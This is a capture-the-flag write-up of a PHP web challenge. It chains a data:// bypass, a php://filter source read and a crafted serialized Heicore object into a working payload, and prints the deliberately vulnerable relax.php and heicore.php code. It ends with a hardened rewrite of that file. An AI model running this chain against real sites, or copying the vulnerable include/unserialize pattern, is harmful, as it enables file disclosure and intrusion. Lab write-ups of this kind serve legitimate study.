【TSCTF

Challenge URL

Opening it shows a site with nothing useful on it, so let's scan it.

Visiting /robots.txt reveals three files:

User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php

Of these, only /relax.php has any content. Viewing its source:

This is aaencode-obfuscated JavaScript. Run it directly in the browser console, or decode it with an online tool:

Tidied up, it reads:

$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
    echo '<img src="./images/13.jpg" alt=""><br>';
    include($__);
} else {
    echo '<img src="./images/1.gif" alt="">';
}

The check file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three" can be bypassed with the data:// pseudo-protocol, since file_get_contents() will happily read a data: URL and return its body.
Below it there is an include($__);. I tried to include the flag with file=flag.php, but the page answered "It's not that simple". I was too naive!
So I used the php://filter pseudo-protocol to read the source of heicore.php and relax.php instead.
heicore.php:

<?php
class Heicore {
    public $file;
    public function __destruct() {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
        }
    }
}

relax.php:

<?php
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
    echo '<img src="./images/13.jpg" alt=""><br>';
    if (preg_match("/flag/i", $__)) {
        echo "It's not that simple";
        exit();
    } else {
        include($__);
        unserialize($___);
    }
} else {
    echo '<img src="./images/1.gif" alt="">';
}
?>

Now we have the complete source, and it does indeed filter the string "flag" in the file parameter.
The destructor in heicore.php prints the contents of $file. So we include heicore.php to load the class, set its $file member to flag.php, and, because relax.php calls unserialize() on the (><) parameter, use deserialization to create a Heicore object whose magic method __destruct() prints the flag when the script ends:

<?php
class Heicore {
    public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$a = new Heicore();
$b = serialize($a);
echo $b;
# Output:
# O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

The resulting payload:

?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}


Base64-decode the output to get the flag.
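As an added example, not part of the original writeup or the challenge code, here is a hardened rewrite of relax.php that removes each of the three links the chain above relies on. It assumes PHP 7.3 or later; the include allowlist and the JSON-based replacement for the (><) parameter are hypothetical choices for illustration.

```php
<?php
// Added example, not the challenge's code: a hardened relax.php in which
// each change removes one link of the chain used in the writeup.
declare(strict_types=1);

const EXPECTED_PW = 'Two thousand three hundred and thirty-three';
// Hypothetical allowlist of files this script may include; adjust per app.
const ALLOWED_INCLUDES = ['heicore.php'];

// 1. Compare the password as a string. The original fed $_GET['pw'] to
//    file_get_contents(), so a data:// URL could supply the expected text.
function checkPassword(?string $pw): bool {
    return $pw !== null && hash_equals(EXPECTED_PW, $pw);
}

// 2. Resolve the include target against an exact allowlist. The blocklist
//    preg_match("/flag/i") still admitted php://filter and heicore.php;
//    an allowlist rejects wrappers, traversal and unknown names alike.
function resolveInclude(?string $file): ?string {
    if ($file === null || !in_array($file, ALLOWED_INCLUDES, true)) {
        return null;
    }
    return __DIR__ . '/' . $file;
}

// 3. Never unserialize() user input. If the parameter must carry structured
//    data, accept JSON: json_decode() yields arrays only, so no Heicore
//    object is created and no __destruct() runs on attacker-controlled data.
function parseOptions(?string $raw): array {
    if ($raw === null || $raw === '') {
        return [];
    }
    try {
        $opts = json_decode($raw, true, 4, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return [];
    }
    return is_array($opts) ? $opts : [];
}

if (!checkPassword($_GET['pw'] ?? null)) {
    echo '<img src="./images/1.gif" alt="">';
    exit();
}
echo '<img src="./images/13.jpg" alt=""><br>';
$target = resolveInclude($_GET['file'] ?? null);
if ($target === null) {
    http_response_code(400);
    exit('invalid file');
}
include $target;
$options = parseOptions($_GET['(><)'] ?? null);
```

With these changes the data:// bypass, the php://filter source read and the serialized Heicore object are all rejected before any file or object is touched.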
